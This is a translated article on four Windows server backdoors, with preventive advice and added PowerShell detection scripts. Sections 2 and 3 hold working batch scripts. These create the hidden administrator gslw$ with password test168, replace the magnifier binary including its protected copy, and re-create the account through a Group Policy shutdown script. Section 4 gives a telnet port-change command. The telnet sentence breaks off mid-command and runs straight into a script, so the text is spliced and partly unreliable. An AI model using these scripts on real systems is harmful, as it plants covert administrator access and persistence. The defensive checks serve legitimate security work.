Secrets of four Windows Backdoors

Source: Internet
Author: User
Tags: administrator password

A backdoor is a channel through which an attacker accesses a system; it is concealed and dangerous, and a real headache for users. There are many backdoors for Windows systems, and the common ones are well known. Below I reveal four very dangerous backdoors that you may not know about.

1. Sniffing and spoofing, the most dangerous backdoor

Instead of creating a new account after taking control of a host, an attacker can install a sniffer on it and steal the administrator's password. Because such a backdoor creates no account but logs on with the sniffed administrator password, it is extremely concealed; an administrator without strong security awareness and sufficient security skills will not find it at all.

(1). Install the sniffer tool

The attacker uploads or downloads the sniffer to the server and installs it. Note that these sniffers are generally small and single-purpose, and they are often built as drivers, so they are extremely concealed and difficult to find and remove.

(2). Get the administrator password

The sniffer monitors the system, and when the administrator logs on to the server it steals the password and saves it to a txt file. The next time the attacker logs on to the server, he opens the txt file to obtain the administrator password; from then on he logs on directly with a valid administrator account instead of creating a new one. If the server is a web server, the attacker may place the txt file in a web directory and then view it through a browser. (Figure 1)


(3). Preventive measures

Because the attacker logs on through this backdoor with a legitimate administrator account, it is hard to detect. Any intrusion leaves traces, however: enable the "Audit Policy" in Group Policy to record user logons, then use the Event Viewer to check for logons at suspicious times. A clever attacker can delete or modify the system logs, so the most thorough measure is to remove the sniffer installed on the system and change the administrator password.
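The logon review described above, written out as an added PowerShell example (not code from the original article): it switches on logon auditing and then lists console and Remote Desktop logons that fall outside an expected administration window. It assumes Windows Server 2008 / PowerShell 2.0 or later, where a successful logon is Security event 4624; on the Windows 2000/2003 systems the article discusses, the equivalent events are IDs 528 and 540. The window hours are assumptions to adjust.

```powershell
# Added example, not code from the original article.
# Lists console (LogonType 2) and Remote Desktop (LogonType 10) logons that
# fall outside a business-hours window, so an administrator can spot an
# attacker using a sniffed administrator password at an unusual time.
# Assumption: Windows Server 2008 / PowerShell 2.0 or later (event ID 4624);
# on Windows 2000/2003 the equivalent successful-logon events are 528 and 540.
param(
    [int]$Days      = 7,    # how far back to look
    [int]$WorkStart = 8,    # start of the expected administration window (hour)
    [int]$WorkEnd   = 18    # end of the window (hour, exclusive)
)

# Step 1: make sure logon auditing is enabled at all (the article's
# "Audit Policy" recommendation). Requires an elevated prompt.
auditpol /set /subcategory:"Logon" /success:enable /failure:enable | Out-Null

# Step 2: pull successful logons from the Security log.
$since  = (Get-Date).AddDays(-$Days)
$events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4624; StartTime = $since }

$findings = foreach ($e in $events) {
    # Event 4624 carries its details as <Data Name="..."> elements; collect them in a hashtable.
    $field = @{}
    foreach ($d in ([xml]$e.ToXml()).Event.EventData.Data) { $field[$d.Name] = $d.'#text' }

    # Only interactive and RDP logons matter for a logon made with a stolen password.
    if (@('2', '10') -notcontains $field['LogonType']) { continue }

    $t        = $e.TimeCreated
    $offHours = ($t.Hour -lt $WorkStart) -or ($t.Hour -ge $WorkEnd)
    $weekend  = @('Saturday', 'Sunday') -contains $t.DayOfWeek.ToString()

    New-Object PSObject -Property @{
        Time        = $t
        Account     = "$($field['TargetDomainName'])\$($field['TargetUserName'])"
        LogonType   = $field['LogonType']
        SourceIP    = $field['IpAddress']
        Workstation = $field['WorkstationName']
        Suspicious  = $offHours -or $weekend
    }
}

# Step 3: show the logons that deserve a second look. An account whose name
# ends in '$' (like the article's gslw$) appears here even though "net user"
# does not display such accounts.
$findings | Where-Object { $_.Suspicious } |
    Sort-Object Time |
    Format-Table Time, Account, LogonType, SourceIP, Workstation -AutoSize
```

Run it from an elevated prompt; a logon with the real administrator account from an unfamiliar source address at 03:00 is exactly the trace a sniffed-password backdoor leaves when the attacker has not yet cleaned the log.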

2. Magnifier program, the most tricky backdoor

Magnifier (magnify.exe) is a tool built into Windows 2000/XP/2003 to help users with visual impairment. It can be launched with the Win+U key combination before a user logs on to the system. For this reason, an attacker can replace the magnifier with a specially crafted file of the same name, magnify.exe, through which the server can be controlled.

In general, the attacker creates an administrator user through the crafted magnify.exe and then logs on to the system. Of course, sometimes the crafted program directly invokes the command line (cmd.exe) or the system shell (explorer.exe). Note that the programs launched this way run with SYSTEM permissions, that is, the highest permissions in the system. To avoid the administrator noticing anything odd when running the magnifier, the attacker generally has the crafted program start the real magnifier after completing its work. The method is as follows:

(1). Construct a batch script

@echo off
rem Create the account gslw$ with password test168; names ending in $ are not shown by "net user"
net user gslw$ test168 /add
rem Make it a local administrator
net localgroup administrators gslw$ /add
rem Start the real magnifier, backed up as nagnify.exe in step (3), so nothing looks unusual
%windir%\system32\nagnify.exe
exit

(Figure 2)


(2). File Format Conversion

Because the batch file magnify.bat has the bat suffix, it must be converted to an exe file of the same name before it can be called through Win+U. The attacker can use WinRAR to build a self-extracting exe, or use bat2com and com2exe to convert the file format. The following takes the latter method as an example.

Open a command prompt, change to the directory where the bat2com and com2exe tools are located, and run "bat2com magnify.bat" to convert magnify.bat to magnify.com, then run "com2exe magnify.com" to convert magnify.com to magnify.exe. The batch file has now become a program file with the same name as the magnifier. (Figure 3)


(3). Replace the magnifier file

Windows ships the replace.exe utility, through which system files can be replaced. With the crafted magnify.exe placed in the %Windir% directory, a batch file can perform the replacement:

@echo off
rem Back up the real magnifier as nagnify.exe (dllcache holds the Windows File Protection copy)
copy %windir%\system32\dllcache\magnify.exe %windir%\system32\nagnify.exe
copy %windir%\system32\magnify.exe %windir%\system32\nagnify.exe
rem Replace both copies with the crafted magnify.exe that sits in %windir%
replace.exe %windir%\magnify.exe %windir%\system32\dllcache
replace.exe %windir%\magnify.exe %windir%\system32
exit

The batch first backs up the real magnifier program as nagnify.exe and then replaces it with the crafted program of the same name. (Figure 4)


(4). Attack Exploitation

After the preceding steps, the magnifier backdoor is in place. The attacker connects to the server through Remote Desktop, presses Win+U in the logon window, and selects the magnifier. At that moment the administrator account gslw$ is created on the server and the Magnifier tool starts. The attacker can then log on to the server with this account. Of course, before disconnecting, the attacker deletes all traces of the account so that the administrator does not discover it. (Figure 5)


(5). Preventive measures

Check whether the icon of %windir%\system32\magnify.exe is the original magnifier icon; if not, a magnifier backdoor may have been implanted. Of course, attackers sometimes give the file the same icon as the original, so also compare the size and modification time of magnify.exe with those of the copy in dllcache; if either does not match, be suspicious. You can also run magnify.exe and then open lusrmgr.msc to check for suspicious users. If you confirm that the server has a magnifier backdoor, first delete the file and restore the normal magnifier program. Of course, you can go further and replace the magnifier with an innocuous program. You can even turn the trick around: construct your own magnify.exe that warns the attacker off or performs intrusion monitoring and evidence collection.
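The file and account checks above, as an added PowerShell example that is not from the original article. It compares the live magnify.exe with the dllcache copy, inspects its signature and size, and enumerates the Administrators group through ADSI so that a $-suffixed account such as gslw$ cannot hide. The check is extended to the other programs Utility Manager (Win+U) can launch at the logon screen; that generalization is mine, not the article's. It assumes PowerShell 2.0 or later, and the dllcache comparison only applies on Windows 2000/XP/2003.

```powershell
# Added example, not code from the original article.
# Verifies the magnifier program the article describes (and the other
# Win+U accessibility programs) and looks for hidden administrators.
# Assumptions: PowerShell 2.0+; dllcache exists only on Windows 2000/XP/2003.

function Get-Sha256Hex([string]$Path) {
    # .NET hashing so the check also works where Get-FileHash (PowerShell 4+) is absent.
    $sha = [System.Security.Cryptography.SHA256]::Create()
    $fs  = [System.IO.File]::OpenRead($Path)
    try     { ([System.BitConverter]::ToString($sha.ComputeHash($fs))).Replace('-', '') }
    finally { $fs.Dispose() }
}

$sys32 = Join-Path $env:windir 'system32'
# magnify.exe is the article's case; the others are the remaining Utility Manager programs.
$names = @('magnify.exe', 'narrator.exe', 'osk.exe', 'utilman.exe')

foreach ($name in $names) {
    $live = Join-Path $sys32 $name
    if (-not (Test-Path $live)) { continue }

    $file  = Get-Item $live
    $sig   = Get-AuthenticodeSignature $live
    $cache = Join-Path $sys32 ('dllcache\' + $name)

    $verdict = @()
    # A system binary should carry a valid Microsoft signature. Some builds sign
    # these files through a catalog rather than an embedded signature, so
    # "NotSigned" alone is not proof; compare against a known-good copy then.
    if ($sig.Status -ne 'Valid' -or $sig.SignerCertificate.Subject -notlike '*Microsoft*') {
        $verdict += "signature: $($sig.Status)"
    }
    # On 2000/XP/2003 the dllcache copy should be byte-identical to the live file.
    if ((Test-Path $cache) -and ((Get-Sha256Hex $live) -ne (Get-Sha256Hex $cache))) {
        $verdict += 'differs from dllcache copy'
    }
    # A batch file converted to an .exe is far smaller than the real program.
    if ($file.Length -lt 20KB) { $verdict += "suspiciously small ($($file.Length) bytes)" }

    $state = if ($verdict.Count) { $verdict -join '; ' } else { 'ok' }
    "{0,-14} {1,8} bytes  modified {2:yyyy-MM-dd HH:mm}  {3}" -f $name, $file.Length, $file.LastWriteTime, $state
}

# Hidden administrators: "net user" omits accounts whose name ends in '$',
# so enumerate the Administrators group through ADSI instead.
$group   = [ADSI]"WinNT://$env:COMPUTERNAME/Administrators,group"
$members = @($group.Invoke('Members')) | ForEach-Object {
    $_.GetType().InvokeMember('Name', 'GetProperty', $null, $_, $null)
}
"Members of Administrators: $($members -join ', ')"
$members | Where-Object { $_ -like '*$' } | ForEach-Object {
    "WARNING: administrator '$_' ends in a dollar sign, which ""net user"" does not list"
}
```

A mismatch against dllcache, a non-Microsoft signer, or a magnify.exe of a few kilobytes each point to the replacement described in step (3); the membership listing covers the account the crafted program creates, whether or not the attacker has deleted it yet.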


3. Group Policy spoofing, the most concealed backdoor

Relatively speaking, the Group Policy backdoor is even more concealed. Adding the corresponding key values to the registry is a common way to make a Trojan run when the system starts; the same can be achieved in Group Policy, which in addition can run operations when the system shuts down. This is done through the "Scripts (Startup/Shutdown)" item, located under "Computer Configuration > Windows Settings". Because of its high concealment, attackers often use it as a server backdoor.

After obtaining control of the server, an attacker can use this backdoor for long-term control of the host, running programs or scripts through it. The simplest use is to create an administrator user, as follows:

(1). Create a script

Create a batch file add.bat with the content: @echo off & net user gslw$ test168 /add & net localgroup administrators gslw$ /add & exit (this creates an administrator user named gslw$ with the password test168).

(2). Backdoor exploitation

In the Run dialog box, enter gpedit.msc, go to "Computer Configuration > Windows Settings > Scripts (Startup/Shutdown)", double-click "Shutdown" in the right pane, and add add.bat. That is to say, the user gslw$ is created whenever the system shuts down. Generally the user does not know that a hidden user exists in the system, and even if he sees and deletes the account, it is created again at the next shutdown. Unless he knows where to look in Group Policy, he will be puzzled.

In fact, this Group Policy "backdoor" has many more uses: through it an attacker can run scripts or programs and sniff the administrator password, after which no account needs to be created at all; the attacker simply logs on remotely with the administrator account. It is therefore a double-edged sword that deserves attention. If your server is inexplicably under attack, the attacker may be using it. (Figure 6)
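Rather than clicking through gpedit.msc, a defender can read the local policy's script registration directly. The following is an added PowerShell example, not code from the original article; it assumes that local Group Policy startup and shutdown scripts are registered in %windir%\System32\GroupPolicy\Machine\Scripts\scripts.ini (psscripts.ini for PowerShell scripts) in the form "0CmdLine=add.bat", and that the GroupPolicy folder is hidden. It lists every registered script and flags bodies that create or elevate accounts, which is what the article's add.bat does.

```powershell
# Added example, not code from the original article.
# Enumerates local Group Policy startup/shutdown scripts and flags account
# manipulation inside them.
# Assumption: registrations live in scripts.ini / psscripts.ini under
# %windir%\System32\GroupPolicy\Machine\Scripts, with entries "NCmdLine=" and
# "NParameters=" under [Startup] and [Shutdown] sections.

$scriptsDir = Join-Path $env:windir 'System32\GroupPolicy\Machine\Scripts'
$iniFiles   = @('scripts.ini', 'psscripts.ini') |
    ForEach-Object { Join-Path $scriptsDir $_ } |
    Where-Object  { Test-Path -LiteralPath $_ }

if (-not $iniFiles) { 'No local Group Policy startup/shutdown scripts are registered.'; return }

# Commands a defender would not expect in a legitimate startup or shutdown script.
$suspect = 'net\s+user\b', 'net1?\s+localgroup\b', 'reg\s+add\b', 'schtasks\b'

foreach ($ini in $iniFiles) {
    "== $ini (modified $((Get-Item -LiteralPath $ini).LastWriteTime))"
    $section = ''
    foreach ($raw in Get-Content -LiteralPath $ini) {
        $line = $raw.Trim()
        if ($line -match '^\[(.+)\]$') { $section = $Matches[1]; continue }
        if ($line -notmatch '^(\d+)CmdLine=(.*)$') { continue }

        $index = $Matches[1]
        $cmd   = $Matches[2]
        # A bare file name refers to the Startup\ or Shutdown\ folder beside the ini file.
        $path = if ([System.IO.Path]::IsPathRooted($cmd)) { $cmd }
                else { Join-Path (Join-Path $scriptsDir $section) $cmd }

        $flag = ''
        if (Test-Path -LiteralPath $path) {
            # Join lines so multi-line batch files are searched as one text (no -Raw in PowerShell 2).
            $body = (Get-Content -LiteralPath $path) -join "`n"
            $hits = @($suspect | Where-Object { $body -match $_ })
            if ($hits.Count) { $flag = 'SUSPICIOUS: matches ' + ($hits -join ', ') }
        } else {
            $flag = 'script file not found'
        }
        "[{0}] #{1} {2}  {3}" -f $section, $index, $cmd, $flag
    }
}
```

Any entry under [Shutdown] that the administrator did not register is worth a look on its own; a body matching "net user" or "net localgroup" is the recurring-account trick from step (2), and the ini file's modification time narrows down when it was planted.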


4. Telnet spoofing, the most easily overlooked backdoor

Telnet is a command-line remote logon tool that administrators often ignore when managing a server. If an attacker enables Remote Desktop for remote control after taking over a server, the administrator can easily notice it, but an enabled Telnet service is far less likely to be noticed. However, telnet's default port is 23, and once enabled it is easy for others to scan, so the attacker changes the telnet port in order to control the server exclusively.

(1). Modify the port

To modify the telnet port of a Windows 2003 server locally, choose Start > Run, enter cmd to open a command prompt, and run "tlntadmn config port=800" (800 is the new telnet port; to avoid port conflicts, do not set it to a well-known service port). Of course, the server's telnet port can also be modified remotely with the command "tlntadmn config \\192.168.1.9 port=800 -u gslw -p test168" (\\192.168.1.9
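Because a relocated telnet port defeats a scan for port 23, the check has to come from the host itself. The following is an added PowerShell example, not code from the original article: it reports whether the Windows Telnet server is installed or running, what port it is configured for, and what its process actually listens on. It assumes the service is named TlntSvr and stores its port in HKLM\SOFTWARE\Microsoft\TelnetServer\1.0\TelnetPort; both lookups are guarded because neither exists where the Telnet server is not installed.

```powershell
# Added example, not code from the original article.
# Reports the Telnet server's state, its configured port and the port its
# process really listens on, so a port moved away from 23 does not go unnoticed.
# Assumptions: service name TlntSvr; port stored in
# HKLM\SOFTWARE\Microsoft\TelnetServer\1.0\TelnetPort (23 when absent).

$svc = Get-WmiObject Win32_Service -Filter "Name='TlntSvr'"
if (-not $svc) { 'Telnet server (TlntSvr) is not installed.'; return }

"Telnet server: state={0} startmode={1} pid={2}" -f $svc.State, $svc.StartMode, $svc.ProcessId
if ($svc.StartMode -ne 'Disabled') { 'WARNING: Telnet server is not disabled' }

# Configured port from the registry; the default is 23.
$cfg  = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\TelnetServer\1.0' -ErrorAction SilentlyContinue
$port = if ($cfg -and $cfg.TelnetPort) { [int]$cfg.TelnetPort } else { 23 }
"Configured telnet port: $port"
if ($port -ne 23) { "WARNING: telnet port has been changed from 23 to $port" }

# What the running service actually listens on, taken from "netstat -ano"
# (columns: Proto, Local Address, Foreign Address, State, PID).
if ($svc.State -eq 'Running') {
    netstat -ano | ForEach-Object {
        if ($_ -match '^\s*TCP\s+\S+:(\d+)\s+\S+\s+LISTENING\s+(\d+)\s*$' -and
            [int]$Matches[2] -eq $svc.ProcessId) {
            "Telnet process is listening on TCP port $($Matches[1])"
        }
    }
}
```

The registry value shows what "tlntadmn config port=..." set; the netstat pass confirms it, and also catches the case where the service was started with a port change that has not yet been written back.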
